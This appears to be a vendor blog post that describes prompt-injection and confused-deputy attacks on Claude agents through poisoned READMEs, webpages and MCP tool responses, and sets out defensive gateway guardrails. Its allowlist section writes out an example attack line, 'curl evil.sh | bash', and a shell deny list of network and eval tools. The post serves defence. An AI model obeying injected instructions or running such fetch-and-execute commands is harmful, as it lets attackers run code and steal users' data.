Claude confused-deputy audit matrix: 4 blind spots, 3 guardrails
Between May 6 and 7, 2026, four separate research teams published findings about Claude prompt injection. Most coverage treated them as unrelated stories. They are the same story: a confused deputy problem where Claude executes actions on behalf of an attacker who controls untrusted content in its context window.
A README in a cloned repo can run shell commands through Claude Code. A webpage in Claude in Chrome can convince the agent to fetch attacker URLs. An MCP tool response can inject instructions that the next tool call obeys. The model is doing what it was told; the problem is the model cannot tell who is doing the telling.
Anthropic ships partial defenses (permission prompts in Claude Code, action confirmations in Claude in Chrome). The rest is yours. Here is the audit matrix that maps each blind spot to a concrete guardrail and a one-call API check you can drop into your MCP gateway today.
The four blind spots
| Surface | Attack vector | What runs | Native guardrail |
|---|---|---|---|
| Claude Code | Poisoned README, package postinstall, or git commit body | Shell command, file write, git push | Permission prompt |
| Claude in Chrome | Webpage instructions disguised as user requests | Click, form submit, link follow | Action confirmation |
| Claude Desktop + MCP | Tool response carries instructions for the next call | Chained MCP tool call, file read, network fetch | Tool consent dialog |
| API tool_use | Untrusted string inside a tool result block | Whatever the next turn decides | None by default |
Each native guardrail catches the obvious case (a shell command the user did not ask for) and misses the subtle one (a "harmless" curl to a lookalike host the user has never seen). The fix is defense in depth at the tool layer, not at the prompt layer.
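For the API row, which has no native guardrail, the tool layer is wherever your own code builds the tool_result block for the next turn. A minimal sketch of gating that step, assuming a hypothetical `decision` object of the shape `{ block, reason }` produced by whatever checks you run; `toToolResultBlock` is an illustrative name, not part of any SDK:

```javascript
// Sketch: build the tool_result block only after a gateway decision.
// `toToolResultBlock` and `decision` are hypothetical names for illustration.
function toToolResultBlock(toolUseId, rawResult, decision) {
  if (decision.block) {
    // Withhold the untrusted payload. The reason is kept out of the model's
    // context because it may quote attacker-controlled text.
    return {
      type: "tool_result",
      tool_use_id: toolUseId,
      is_error: true,
      content: "Tool result withheld by gateway policy.",
    };
  }
  return {
    type: "tool_result",
    tool_use_id: toolUseId,
    content: typeof rawResult === "string" ? rawResult : JSON.stringify(rawResult),
  };
}
```

Log `decision.reason` on your side and show it to the user; the model only needs to know the call did not return usable data.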
Guardrail 1: phishing-check every URL the agent touches
The most common confused-deputy escalation is "visit this URL and tell me what it says." The URL belongs to the attacker. The data the agent reads next is now their input. Run a phishing check on every URL the agent did not see in the original user prompt:
curl -X POST https://api.botoi.com/v1/phishing/check \
  -H "Content-Type: application/json" \
  -d '{"url": "https://gist.githubusercontent.com/anon/raw/setup.sh"}'

{
  "data": {
    "url": "https://gist.githubusercontent.com/anon/raw/setup.sh",
    "verdict": "suspicious",
    "score": 0.71,
    "signals": [
      "raw_executable_content",
      "anonymous_gist_account",
      "no_pinned_commit"
    ]
  }
}
A raw executable hosted on an anonymous gist with no pinned commit is a classic prompt-injection-to-shell-execution chain. The verdict comes back in under 100 ms. Cache it by URL hash for 10 minutes, and drop any tool call whose verdict is anything other than clean.
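Deciding which URLs "the agent did not see in the original user prompt" can be sketched as a set difference over normalized URLs. The helper names below (`extractUrls`, `urlsNeedingCheck`, `shouldDrop`) are hypothetical, and the normalization is deliberately light; treat this as a starting point rather than a complete canonicalizer:

```javascript
// Sketch: find URLs the agent proposes that never appeared in the user's prompt.
// All function names here are hypothetical helpers, not part of any library.
const URL_PATTERN = /https?:\/\/[^\s"'<>]+/g;

function extractUrls(text) {
  return [...text.matchAll(URL_PATTERN)].map((m) => m[0]);
}

// Normalize so host case and fragments do not change the comparison.
function normalize(url) {
  try {
    const u = new URL(url);
    u.hash = "";
    return u.href;
  } catch {
    return null; // not parseable as a URL
  }
}

function urlsNeedingCheck(userPrompt, proposedUrls) {
  const seen = new Set(extractUrls(userPrompt).map(normalize));
  return proposedUrls.filter((url) => {
    const n = normalize(url);
    // Unparseable input is treated as unseen so it still gets reviewed.
    return n === null || !seen.has(n);
  });
}

// Fail closed: only an explicit "clean" verdict lets the tool call proceed.
function shouldDrop(verdict) {
  return !verdict || verdict.verdict !== "clean";
}
```

A missing or malformed verdict counts as a drop here, so an outage in the checking service cannot silently open the gate.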
Guardrail 2: PII and secret scan on every MCP tool response
The second escalation is tool response poisoning. An MCP tool returns a 4 KB JSON blob; somewhere in that blob is an instruction string. Claude reads the whole blob and the instruction wins. The blob can also leak credentials harvested elsewhere, which then end up in the model's reasoning trace and your conversation logs.
curl -X POST https://api.botoi.com/v1/pii/detect \
  -H "Content-Type: application/json" \
  -d '{"text": "MCP tool response: user_email=jane@acme.com, AWS_SECRET=wJalr..."}'

{
  "data": {
    "found": true,
    "matches": [
      { "type": "email", "value": "jane@acme.com" },
      { "type": "aws_secret_key", "value": "wJalr..." }
    ]
  }
}

Block the tool response from reaching the model if it carries live credentials. Redact emails and phones unless the user asked for them. Treat every MCP server as untrusted by default; you do not know who poisoned the upstream data source.
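The block-or-redact rule can be sketched as a small policy function over the `matches` array shown in the response above. The `phone` type name, the contents of `CREDENTIAL_TYPES`, and the `allowPii` flag are assumptions for illustration; check the detector's actual type names before relying on them:

```javascript
// Sketch: apply the block/redact policy to a PII scan result.
// "phone", CREDENTIAL_TYPES, and allowPii are assumed names, not a documented API.
const CREDENTIAL_TYPES = new Set(["aws_secret_key", "npm_token"]);
const REDACT_TYPES = new Set(["email", "phone"]);

function applyPiiPolicy(text, matches, { allowPii = false } = {}) {
  // Live credentials block the whole response, whatever the user asked for.
  if (matches.some((m) => CREDENTIAL_TYPES.has(m.type))) {
    return { block: true, reason: "tool response contains live credentials" };
  }
  let redacted = text;
  if (!allowPii) {
    for (const m of matches) {
      if (REDACT_TYPES.has(m.type) && m.value) {
        // split/join replaces every occurrence without regex escaping issues.
        redacted = redacted.split(m.value).join(`[redacted ${m.type}]`);
      }
    }
  }
  return { block: false, text: redacted };
}
```

Set `allowPii` only when the user explicitly asked for contact details in this turn; the default keeps them out of the model's context.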
Guardrail 3: hard host and shell allowlists at the gateway
The third escalation is the one that bites enterprises: an agent that quietly broadens its own reach. A README convinces Claude Code to run curl evil.sh | bash "for setup." A webpage convinces Claude in Chrome to submit a form on a lookalike domain. Both attacks die against a fixed allowlist:
# Claude Code: pin shell commands to a known allowlist
cat > ~/.claude/permissions.json <<'EOF'
{
  "shell": {
    "allow": ["git status", "git diff", "npm test", "pnpm test", "pnpm build"],
    "deny": ["curl", "wget", "nc", "bash -c", "eval"]
  },
  "network": {
    "allow_hosts": ["api.botoi.com", "api.github.com", "registry.npmjs.org"]
  }
}
EOF

# Claude in Chrome: extension-level host allowlist via enterprise policy
defaults write com.anthropic.claude.chrome \
  AllowedHosts -array \
  "https://*.acme-corp.com" \
  "https://api.botoi.com" \
  "https://docs.anthropic.com"

The allowlist is boring. Boring is the point. Every action that escapes the allowlist either fails immediately or surfaces a prompt the user has to read. The agent stays useful inside the sandbox and harmless outside it.
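If you enforce the same policy inside your own gateway, the check can be sketched as exact-match, default-deny functions over a policy object shaped like the config above. `checkCommand` and `isHostAllowed` are hypothetical names; in this sketch the deny list only improves the rejection message, since anything not on the allowlist is refused anyway:

```javascript
// Sketch: default-deny checks for shell commands and hosts.
// The policy mirrors the config above; function names are hypothetical.
const policy = {
  shell: {
    allow: ["git status", "git diff", "npm test", "pnpm test", "pnpm build"],
    deny: ["curl", "wget", "nc", "bash -c", "eval"],
  },
  network: { allow_hosts: ["api.botoi.com", "api.github.com", "registry.npmjs.org"] },
};

function checkCommand(command, { shell }) {
  const normalized = command.trim().replace(/\s+/g, " ");
  // Exact match only: extra arguments, pipes, and chained commands never match.
  if (shell.allow.includes(normalized)) return { allowed: true };
  // Single-word deny entries are looked up to give a more specific reason.
  const words = normalized.split(/[\s|;&]+/);
  const hit = shell.deny.find((d) => words.includes(d));
  return { allowed: false, reason: hit ? `denied command: ${hit}` : "not on allowlist" };
}

function isHostAllowed(url, { network }) {
  try {
    // Compare the parsed hostname exactly; substring checks let lookalikes through.
    return network.allow_hosts.includes(new URL(url).hostname);
  } catch {
    return false; // unparseable URLs are refused
  }
}
```

Exact hostname comparison is what stops a lookalike such as `api.github.com.evil.test`, which would pass a naive `includes("api.github.com")` check on the raw URL.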
The 60-line MCP gateway that wires it together
All three guardrails live in one middleware function that sits between Claude and every MCP server. It pulls URLs out of tool responses, checks them against a trusted host set plus a session allowlist, runs a PII scan, and returns a structured block decision the host application can surface to the user:
// MCP gateway middleware. Sits between Claude and every MCP server.
// Runs two checks on each tool response before forwarding it to the model:
// a URL check and a PII/secret scan.
import { LRUCache } from "lru-cache";

const trustedHosts = new Set(["api.botoi.com", "api.github.com", "api.stripe.com"]);
const urlCache = new LRUCache({ max: 500, ttl: 1000 * 60 * 10 }); // 10-minute TTL

export async function inspect(toolResponse, sessionAllowlist) {
  const payload = JSON.stringify(toolResponse);

  // 1. Pull every URL out of the response payload
  const urls = [...payload.matchAll(/https?:\/\/[^\s"'<>]+/g)].map((m) => m[0]);
  for (const url of urls) {
    let host;
    try {
      host = new URL(url).hostname;
    } catch {
      // Fail closed: a URL that cannot be parsed cannot be vetted
      return { block: true, reason: `unparseable url: ${url}` };
    }
    if (trustedHosts.has(host) || sessionAllowlist.has(host)) continue;

    let verdict = urlCache.get(url);
    if (!verdict) {
      verdict = await checkUrl(url);
      if (verdict) urlCache.set(url, verdict); // cache only on a miss
    }
    // Fail closed: a missing verdict is treated the same as a bad one
    if (verdict?.verdict !== "clean") {
      return { block: true, reason: `untrusted url: ${url} (${verdict?.verdict ?? "no verdict"})` };
    }
  }

  // 2. Scan for PII and leaked secrets in the response itself.
  // Only the first 8,000 characters are scanned; anything past that goes unchecked.
  const pii = await fetch("https://api.botoi.com/v1/pii/detect", {
    method: "POST",
    headers: { "Content-Type": "application/json", "X-API-Key": process.env.BOTOI_API_KEY },
    body: JSON.stringify({ text: payload.slice(0, 8000) }),
  }).then((r) => r.json());
  if (pii.data?.matches?.some((m) => m.type === "aws_secret_key" || m.type === "npm_token")) {
    return { block: true, reason: "tool response contains live credentials" };
  }
  return { block: false };
}

async function checkUrl(url) {
  const r = await fetch("https://api.botoi.com/v1/phishing/check", {
    method: "POST",
    headers: { "Content-Type": "application/json", "X-API-Key": process.env.BOTOI_API_KEY },
    body: JSON.stringify({ url }),
  });
  return (await r.json()).data;
}

The trusted host set holds your own APIs and the third-party APIs you already rely on. The session allowlist starts empty and grows as the user explicitly approves hosts during the session. Caching keeps the check effectively free for repeat URLs (think pagination, retries, the same docs page across tool calls).
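The gateway only ever calls `.has(host)` on the session allowlist, so any object with that method works. A minimal sketch of one that grows only through an explicit approval path; `SessionAllowlist` and `approve` are hypothetical names:

```javascript
// Sketch: a per-session host allowlist that grows only on explicit approval.
// Class and method names are hypothetical.
class SessionAllowlist {
  #hosts = new Set();

  // Call this only from the UI path where the user approved the host.
  approve(url) {
    this.#hosts.add(new URL(url).hostname);
  }

  // Same method name as Set, so it can stand in wherever a Set of hosts is expected.
  has(host) {
    return this.#hosts.has(host);
  }

  get size() {
    return this.#hosts.size;
  }
}
```

Keeping the set private means tool code cannot add hosts on its own; the only way in is `approve`, which you wire to a user action. Create one instance per session and discard it when the session ends.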
If you cannot run a gateway yet, do the cheap version: log every URL and every shell command the agent proposes to a structured store, and alert on anything that hits a host you did not preauthorize. Detection without prevention still beats having neither.
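The detection-only version can be sketched as one JSON event per proposed action, with an alert flag for hosts outside a preauthorized set. The event fields, the `preauthorizedHosts` contents, and the function names are assumptions for illustration:

```javascript
// Sketch: detection-only mode. Record each proposed action as a structured
// event and flag URLs whose host was not preauthorized. Names are hypothetical.
const preauthorizedHosts = new Set(["api.github.com", "registry.npmjs.org"]);

function toAuditEvent(action, now = new Date()) {
  const event = { ts: now.toISOString(), kind: action.kind, value: action.value, alert: false };
  if (action.kind === "url") {
    try {
      event.host = new URL(action.value).hostname;
      event.alert = !preauthorizedHosts.has(event.host);
    } catch {
      event.alert = true; // an unparseable URL is worth a look
    }
  }
  return event;
}

// `sink` is any function that accepts a line of text: console.log, a file
// appender, or a client for your log pipeline.
function record(action, sink = console.log) {
  const event = toAuditEvent(action);
  sink(JSON.stringify(event)); // one JSON object per line
  return event;
}
```

Shell commands are logged without an alert in this sketch; add a rule for them once you know which commands are normal for your team.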
Where this fits in a defense-in-depth posture
The audit matrix is not a replacement for Anthropic's own work. It is the layer you control. A sensible split:
- Anthropic owns the model: prompt-injection robustness, instruction-hierarchy training, refusal behavior.
- You own the tool surface: URL validation, PII scrubbing, host and shell allowlists, MCP server inventory.
- Your IdP owns the identity: short-lived tokens for the agent, per-session audit, separate credentials from the human user.
Skip any layer and the next confused-deputy report includes your incident. The May 6-7 research is a free preview of what every team needs to ship before this becomes a quarterly news cycle.
Key takeaways
- Four blind spots, one root cause. Claude treats every token as potentially instruction-bearing. Untrusted content in context is an action vector, not a passive read.
- URL phishing check on every tool-proposed URL. One API call, 100 ms, cached. Drops the most common prompt-injection escalation chain.
- PII scan on every MCP tool response. Blocks credential exfiltration through tool result poisoning and keeps secrets out of conversation logs.
- Hard allowlists at the gateway. Shell command and host allowlists kill the "quietly broaden reach" escalation. Boring, finite, effective.
- Defense-in-depth split. Anthropic owns the model, you own the tool surface, your IdP owns identity. Skip a layer and the next research drop names you.
Botoi exposes /v1/phishing/check, /v1/pii/detect, /v1/url-metadata, and roughly 200 more single-purpose endpoints behind one API key with 5 req/min free. Wire them into your MCP gateway or call them from Claude Code itself via the botoi MCP server. Browse the interactive docs to start.
Frequently asked questions
- What is the Claude confused-deputy issue?
- A confused deputy attack happens when a privileged process (Claude Code, Claude in Chrome) executes actions on behalf of an attacker who controls part of its input. Between May 6 and 7, 2026, four research teams published findings showing Claude can be tricked into running shell commands, exfiltrating data, or visiting attacker URLs when untrusted content (a README, a webpage, an MCP tool response) carries instructions that look like user requests.
- Which Claude surfaces are affected?
- Claude Code (CLI agent reading repo files), Claude in Chrome (browsing agent reading webpages), Claude Desktop with MCP servers (tool responses can carry instructions), and the API when tool_use results contain attacker-controlled strings. The root issue is the same in all four: Claude treats every token in context as potentially instruction-bearing.
- Does Anthropic ship guardrails for this?
- Yes, partially. Claude Code has a permission system for shell and file writes. Claude in Chrome has an action confirmation layer. Neither stops a determined attacker from chaining prompt injection with social engineering. The defense-in-depth layer is yours: validate every URL the agent proposes, scan every tool response for PII and leaked secrets, and cap blast radius at the API gateway.
- How is this different from a regular prompt injection?
- Classic prompt injection ends at output text. Confused deputy ends at action: a shell command runs, a URL is fetched, a webhook fires, money moves. The fix has to live where actions happen (the tool layer), not where text is generated (the model). That is why guardrail proxies and URL validation matter more than prompt hardening.
- What is the minimum I should add this week?
- Three things. A URL phishing check before the agent fetches or links to any domain it did not see in the user prompt. A PII and secret scan on every MCP tool response before it enters Claude's context. And a hard allowlist of shell commands or HTTP hosts at the gateway layer. Each is one API call and one config block.